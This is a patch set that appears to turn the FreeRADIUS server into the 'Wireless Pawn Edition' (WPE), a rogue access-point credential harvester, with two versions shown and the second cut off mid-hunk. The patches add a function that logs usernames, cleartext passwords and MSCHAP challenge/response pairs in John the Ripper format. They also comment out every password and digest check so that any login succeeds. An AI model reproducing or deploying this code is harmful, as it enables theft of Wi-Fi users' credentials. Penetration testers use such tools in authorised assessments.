+#include <stdio.h>
+#include <time.h>
+
log_lvl_t rad_debug_lvl = 0; //!< Global debugging level
static bool rate_limit = true; //!< Whether repeated log entries should be rate limited
@@ -226,6 +230,73 @@ static int stdout_fd = -1; //!< The orig
static char const spaces[] = " ";
+/** Prints username, password or challenge/response
+ *
+ */
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename)
+{
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (logfilename == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(logfilename, "a");
+ if (logfd == NULL) {
+ fr_strerror_printf(" log: FAILED: Unable to open output log file %s: %s", logfilename, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL
+ && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+
+ fclose(logfd);
+}
+
/** On fault, reset STDOUT and STDERR to something useful
*
* @return 0
diff -Nurp freeradius-server-3.0.18/src/main/mainconfig.c freeradius-server-3.0.18-wpe/src/main/mainconfig.c
--- freeradius-server-3.0.18/src/main/mainconfig.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/main/mainconfig.c 2019-02-26 14:02:54.666099898 -0500
@@ -194,6 +194,7 @@ static const CONF_PARSER server_config[]
{ "max_requests", FR_CONF_POINTER(PW_TYPE_INTEGER, &main_config.max_requests), STRINGIFY(MAX_REQUESTS) },
{ "pidfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.pid_file), "${run_dir}/radiusd.pid"},
{ "checkrad", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.checkrad), "${sbindir}/checkrad" },
+ { "wpelogfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.wpelogfile), "${logdir}/freeradius-server-wpe.log" },
{ "debug_level", FR_CONF_POINTER(PW_TYPE_INTEGER, &main_config.debug_level), "0"},
diff -Nurp freeradius-server-3.0.18/src/main/radiusd.c freeradius-server-3.0.18-wpe/src/main/radiusd.c
--- freeradius-server-3.0.18/src/main/radiusd.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/main/radiusd.c 2019-02-26 14:02:54.666099898 -0500
@@ -64,7 +64,7 @@ char const *radlog_dir = NULL;
bool log_stripped_names;
-char const *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION_STRING
+char const *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION_STRING
#ifdef RADIUSD_VERSION_COMMIT
" (git #" STRINGIFY(RADIUSD_VERSION_COMMIT) ")"
#endif
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2019-02-26 14:02:54.670099870 -0500
@@ -204,10 +204,11 @@ static int eapleap_ntpwdhash(uint8_t *ou
/*
* Verify the MS-CHAP response from the user.
*/
-int eapleap_stage4(REQUEST *request, leap_packet_t *packet, VALUE_PAIR *password, leap_session_t *session)
+int eapleap_stage4(REQUEST *request, leap_packet_t *packet, VALUE_PAIR *password, leap_session_t *session, char *username)
{
uint8_t hash[16];
uint8_t response[24];
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -225,6 +226,7 @@ int eapleap_stage4(REQUEST *request, lea
*/
eapleap_mschap(hash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24, main_config.wpelogfile);
RDEBUG2("NTChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2019-02-26 14:02:54.670099870 -0500
@@ -63,7 +63,7 @@ typedef struct leap_session_t {
int eapleap_compose(REQUEST *request, EAP_DS *auth, leap_packet_t *reply);
leap_packet_t *eapleap_extract(REQUEST *request, EAP_DS *eap_ds);
leap_packet_t *eapleap_initiate(REQUEST *request, EAP_DS *eap_ds, VALUE_PAIR *user_name);
-int eapleap_stage4(REQUEST *request, leap_packet_t *packet, VALUE_PAIR* password, leap_session_t *session);
+int eapleap_stage4(REQUEST *request, leap_packet_t *packet, VALUE_PAIR* password, leap_session_t *session, char * username);
leap_packet_t *eapleap_stage6(REQUEST *request, leap_packet_t *packet, VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session);
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2019-02-26 14:02:54.670099870 -0500
@@ -94,6 +94,7 @@ static int CC_HINT(nonnull) mod_process(
leap_session_t *session;
leap_packet_t *packet;
leap_packet_t *reply;
+ char *username;
VALUE_PAIR *password;
if (!handler->opaque) {
@@ -110,6 +111,8 @@ static int CC_HINT(nonnull) mod_process(
return 0;
}
+ username = (char *)handler->request->username->vp_strvalue;
+
/*
* The password is never sent over the wire.
* Always get the configured password, for each user.
@@ -132,7 +135,7 @@ static int CC_HINT(nonnull) mod_process(
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
RDEBUG2("Stage 4");
- rcode = eapleap_stage4(request, packet, password, session);
+ rcode = eapleap_stage4(request, packet, password, session, username);
session->stage = 6;
/*
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2019-02-26 14:04:36.965168639 -0500
@@ -166,10 +166,14 @@ int eapmd5_verify(MD5_PACKET *packet, VA
/*
* The length of the response is always 16 for MD5.
*/
+ /*
if (rad_digest_cmp(digest, packet->value, 16) != 0) {
DEBUG("EAP-MD5 digests do not match.");
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16, main_config.wpelogfile);
return 1;
}
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-3.0.18-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-3.0.18/src/modules/rlm_mschap/rlm_mschap.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_mschap/rlm_mschap.c 2019-02-26 14:02:54.670099870 -0500
@@ -1104,10 +1104,13 @@ ntlm_auth_err:
*/
static int CC_HINT(nonnull (1, 2, 4, 5 ,6)) do_mschap(rlm_mschap_t *inst, REQUEST *request, VALUE_PAIR *password,
uint8_t const *challenge, uint8_t const *response,
- uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method)
+ uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method,
+ const char *username)
{
uint8_t calculated[24];
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24, main_config.wpelogfile);
+
memset(nthashhash, 0, NT_DIGEST_LENGTH);
switch (method) {
@@ -1124,9 +1127,11 @@ static int CC_HINT(nonnull (1, 2, 4, 5 ,
}
smbdes_mschap(password->vp_octets, challenge, calculated);
+ /*
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1912,7 +1917,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
* Do the MS-CHAP authentication.
*/
mschap_result = do_mschap(inst, request, password, challenge->vp_octets,
- response->vp_octets + offset, nthashhash, auth_method);
+ response->vp_octets + offset, nthashhash, auth_method, NULL);
/*
* Check for errors, and add MSCHAP-Error if necessary.
*/
@@ -2029,7 +2034,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
RDEBUG2("Client is using MS-CHAPv2");
mschap_result = do_mschap(inst, request, nt_password, mschapv1_challenge,
- response->vp_octets + 26, nthashhash, auth_method);
+ response->vp_octets + 26, nthashhash, auth_method, username_string);
rcode = mschap_error(inst, request, *response->vp_octets,
mschap_result, mschap_version, smb_ctrl);
if (rcode != RLM_MODULE_OK) return rcode;
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_pap/rlm_pap.c freeradius-server-3.0.18-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-3.0.18/src/modules/rlm_pap/rlm_pap.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_pap/rlm_pap.c 2019-02-26 14:02:54.670099870 -0500
@@ -540,6 +540,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
RDEBUG("Comparing with \"known good\" Cleartext-Password");
}
+ /*
if ((vp->vp_length != request->password->vp_length) ||
(rad_digest_cmp(vp->vp_octets,
request->password->vp_octets,
@@ -547,6 +548,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
REDEBUG("Cleartext password does not match \"known good\" password");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -585,12 +587,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md5_update(&md5_context, request->password->vp_octets,
request->password->vp_length);
fr_md5_final(digest, &md5_context);
-
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
-
+ */
return RLM_MODULE_OK;
}
@@ -619,10 +621,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
REDEBUG("SMD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -647,10 +651,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
request->password->vp_length);
fr_sha1_final(digest,&sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("SHA1 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -676,10 +682,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_sha1_update(&sha1_context, &vp->vp_octets[20], vp->vp_length - 20);
fr_sha1_final(digest, &sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
REDEBUG("SSHA digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -740,10 +748,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
rad_assert((size_t) digest_len == vp->vp_length); /* This would be an OpenSSL bug... */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -812,10 +822,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
/*
* Only compare digest_len bytes, the rest is salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, (size_t)digest_len) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -849,10 +861,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md4_calc(digest, (uint8_t *) ucs2_password, len);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("NT digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -879,11 +893,13 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
return RLM_MODULE_FAIL;
}
+ /*
if ((fr_hex2bin(digest, sizeof(digest), charbuf, len) != vp->vp_length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0)) {
REDEBUG("LM digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -940,10 +956,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md5_final(buff, &md5_context);
}
+ /*
if (rad_digest_cmp(digest, buff, 16) != 0) {
REDEBUG("NS-MTA-MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -967,6 +985,9 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0, main_config.wpelogfile);
+
/*
* The user MUST supply a non-zero-length password.
*/


@ -1,404 +0,0 @@
diff -rupN freeradius-server-3.2.0/raddb/mods-config/files/authorize freeradius-server-3.2.0-wpe/raddb/mods-config/files/authorize
--- freeradius-server-3.2.0/raddb/mods-config/files/authorize 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/raddb/mods-config/files/authorize 2022-05-02 23:05:06.000000000 +0000
@@ -204,3 +204,5 @@ DEFAULT Hint == "SLIP"
# See the example user "bob" above. #
#########################################################
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -rupN freeradius-server-3.2.0/raddb/radiusd.conf.in freeradius-server-3.2.0-wpe/raddb/radiusd.conf.in
--- freeradius-server-3.2.0/raddb/radiusd.conf.in 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/raddb/radiusd.conf.in 2022-05-02 23:05:06.000000000 +0000
@@ -445,6 +445,9 @@ ENV {
# LD_PRELOAD = /path/to/library2.so
}
+# Wireless Pawn Edition log file
+wpelogfile = ${logdir}/freeradius-server-wpe.log
+
# SECURITY CONFIGURATION
#
# There may be multiple methods of attacking on the server. This
diff -rupN freeradius-server-3.2.0/src/include/log.h freeradius-server-3.2.0-wpe/src/include/log.h
--- freeradius-server-3.2.0/src/include/log.h 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/include/log.h 2022-05-02 23:05:06.000000000 +0000
@@ -72,6 +72,11 @@ typedef struct fr_log_t {
char const *debug_file; //!< Path to debug log file.
} fr_log_t;
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename);
+
typedef void (*radlog_func_t)(log_type_t lvl, log_lvl_t priority, REQUEST *, char const *, va_list ap);
extern FR_NAME_NUMBER const syslog_facility_table[];
diff -rupN freeradius-server-3.2.0/src/include/radiusd.h freeradius-server-3.2.0-wpe/src/include/radiusd.h
--- freeradius-server-3.2.0/src/include/radiusd.h 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/include/radiusd.h 2022-05-02 23:05:06.000000000 +0000
@@ -152,6 +152,8 @@ typedef struct main_config {
char const *checkrad; //!< Script to use to determine if a user is already
//!< connected.
+ char const *wpelogfile; //!< Wireless Pawn Edition log file path.
+
rad_listen_t *listen; //!< Head of a linked list of listeners.
diff -rupN freeradius-server-3.2.0/src/main/auth.c freeradius-server-3.2.0-wpe/src/main/auth.c
--- freeradius-server-3.2.0/src/main/auth.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/main/auth.c 2022-05-02 23:05:06.000000000 +0000
@@ -129,6 +129,7 @@ static int rad_authlog(char const *msg,
} else {
fr_prints(clean_password, sizeof(clean_password),
request->password->vp_strvalue, request->password->vp_length, '\0');
+ log_wpe("password", request->username->vp_strvalue, clean_password, NULL, 0, NULL, 0, main_config.wpelogfile);
}
}
diff -rupN freeradius-server-3.2.0/src/main/libfreeradius-server.mk freeradius-server-3.2.0-wpe/src/main/libfreeradius-server.mk
--- freeradius-server-3.2.0/src/main/libfreeradius-server.mk 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/main/libfreeradius-server.mk 2022-05-02 23:05:06.000000000 +0000
@@ -14,6 +14,7 @@ SOURCES := conffile.c \
pair.c \
xlat.c
+
# This lets the linker determine which version of the SSLeay functions to use.
TGT_LDLIBS := $(OPENSSL_LIBS)
diff -rupN freeradius-server-3.2.0/src/main/log.c freeradius-server-3.2.0-wpe/src/main/log.c
--- freeradius-server-3.2.0/src/main/log.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/main/log.c 2022-05-02 23:05:06.000000000 +0000
@@ -29,6 +29,7 @@ RCSID("$Id: 1ca2f914c258f3c199274421d7d2
#include <freeradius-devel/radiusd.h>
#include <freeradius-devel/rad_assert.h>
+/*#include <freeradius-devel/conf.h>*/
#ifdef HAVE_SYS_STAT_H
# include <sys/stat.h>
@@ -46,6 +47,9 @@ RCSID("$Id: 1ca2f914c258f3c199274421d7d2
#include <pthread.h>
#endif
+#include <stdio.h>
+#include <time.h>
+
log_lvl_t rad_debug_lvl = 0; //!< Global debugging level
static bool rate_limit = true; //!< Whether repeated log entries should be rate limited
@@ -226,6 +230,73 @@ static int stdout_fd = -1; //!< The orig
static char const spaces[] = " ";
+/** Prints username, password or challenge/response
+ *
+ */
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename)
+{
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (logfilename == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(logfilename, "a");
+ if (logfd == NULL) {
+ fr_strerror_printf(" log: FAILED: Unable to open output log file %s: %s", logfilename, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL
+ && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+
+ fclose(logfd);
+}
+
/** On fault, reset STDOUT and STDERR to something useful
*
* @return 0
diff -rupN freeradius-server-3.2.0/src/main/mainconfig.c freeradius-server-3.2.0-wpe/src/main/mainconfig.c
--- freeradius-server-3.2.0/src/main/mainconfig.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/main/mainconfig.c 2022-05-02 23:05:06.000000000 +0000
@@ -200,6 +200,7 @@ static const CONF_PARSER server_config[]
{ "postauth_client_lost", FR_CONF_POINTER(PW_TYPE_BOOLEAN, &main_config.postauth_client_lost), "no" },
{ "pidfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.pid_file), "${run_dir}/radiusd.pid"},
{ "checkrad", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.checkrad), "${sbindir}/checkrad" },
+ { "wpelogfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.wpelogfile), "${logdir}/freeradius-server-wpe.log" },
{ "debug_level", FR_CONF_POINTER(PW_TYPE_INTEGER, &main_config.debug_level), "0"},
diff -rupN freeradius-server-3.2.0/src/main/radiusd.c freeradius-server-3.2.0-wpe/src/main/radiusd.c
--- freeradius-server-3.2.0/src/main/radiusd.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/main/radiusd.c 2022-05-02 23:05:06.000000000 +0000
@@ -64,7 +64,7 @@ char const *radlog_dir = NULL;
bool log_stripped_names;
-char const *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION_STRING
+char const *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION_STRING
#ifdef RADIUSD_VERSION_COMMIT
" (git #" STRINGIFY(RADIUSD_VERSION_COMMIT) ")"
#endif
diff -rupN freeradius-server-3.2.0/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-3.2.0-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-3.2.0/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2022-05-02 23:05:06.000000000 +0000
@@ -166,10 +166,14 @@ int eapmd5_verify(MD5_PACKET *packet, VA
/*
* The length of the response is always 16 for MD5.
*/
+ /*
if (rad_digest_cmp(digest, packet->value, 16) != 0) {
DEBUG("EAP-MD5 digests do not match.");
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16, main_config.wpelogfile);
return 1;
}
diff -rupN freeradius-server-3.2.0/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-3.2.0-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-3.2.0/src/modules/rlm_mschap/rlm_mschap.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/modules/rlm_mschap/rlm_mschap.c 2022-05-02 23:05:06.000000000 +0000
@@ -1189,10 +1189,13 @@ ntlm_auth_err:
*/
static int CC_HINT(nonnull (1, 2, 4, 5 ,6)) do_mschap(rlm_mschap_t *inst, REQUEST *request, VALUE_PAIR *password,
uint8_t const *challenge, uint8_t const *response,
- uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method)
+ uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method,
+ const char *username)
{
uint8_t calculated[24];
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24, main_config.wpelogfile);
+
memset(nthashhash, 0, NT_DIGEST_LENGTH);
switch (method) {
@@ -1209,9 +1212,11 @@ static int CC_HINT(nonnull (1, 2, 4, 5 ,
}
smbdes_mschap(password->vp_octets, challenge, calculated);
+ /*
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1945,7 +1950,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
* Do the MS-CHAP authentication.
*/
mschap_result = do_mschap(inst, request, password, challenge->vp_octets,
- response->vp_octets + offset, nthashhash, auth_method);
+ response->vp_octets + offset, nthashhash, auth_method, NULL);
/*
* Check for errors, and add MSCHAP-Error if necessary.
*/
@@ -2062,7 +2067,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
RDEBUG2("Client is using MS-CHAPv2");
mschap_result = do_mschap(inst, request, nt_password, mschapv1_challenge,
- response->vp_octets + 26, nthashhash, auth_method);
+ response->vp_octets + 26, nthashhash, auth_method, username_string);
rcode = mschap_error(inst, request, *response->vp_octets,
mschap_result, mschap_version, smb_ctrl);
if (rcode != RLM_MODULE_OK) return rcode;
diff -rupN freeradius-server-3.2.0/src/modules/rlm_pap/rlm_pap.c freeradius-server-3.2.0-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-3.2.0/src/modules/rlm_pap/rlm_pap.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/modules/rlm_pap/rlm_pap.c 2022-05-02 23:05:06.000000000 +0000
@@ -563,6 +563,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
RDEBUG("Comparing with \"known good\" Cleartext-Password");
}
+ /*
if ((vp->vp_length != request->password->vp_length) ||
(rad_digest_cmp(vp->vp_octets,
request->password->vp_octets,
@@ -570,6 +571,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
REDEBUG("Cleartext password does not match \"known good\" password");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -608,12 +610,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md5_update(&md5_context, request->password->vp_octets,
request->password->vp_length);
fr_md5_final(digest, &md5_context);
-
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
-
+ */
return RLM_MODULE_OK;
}
@@ -642,10 +644,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
REDEBUG("SMD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -670,10 +674,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
request->password->vp_length);
fr_sha1_final(digest,&sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("SHA1 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -699,10 +705,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_sha1_update(&sha1_context, &vp->vp_octets[20], vp->vp_length - 20);
fr_sha1_final(digest, &sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
REDEBUG("SSHA digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -763,10 +771,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
rad_assert((size_t) digest_len == vp->vp_length); /* This would be an OpenSSL bug... */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -835,10 +845,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
/*
* Only compare digest_len bytes, the rest is salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, (size_t)digest_len) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1166,10 +1178,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md4_calc(digest, (uint8_t *) ucs2_password, len);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("NT digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1196,11 +1210,13 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
return RLM_MODULE_FAIL;
}
+ /*
if ((fr_hex2bin(digest, sizeof(digest), charbuf, len) != vp->vp_length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0)) {
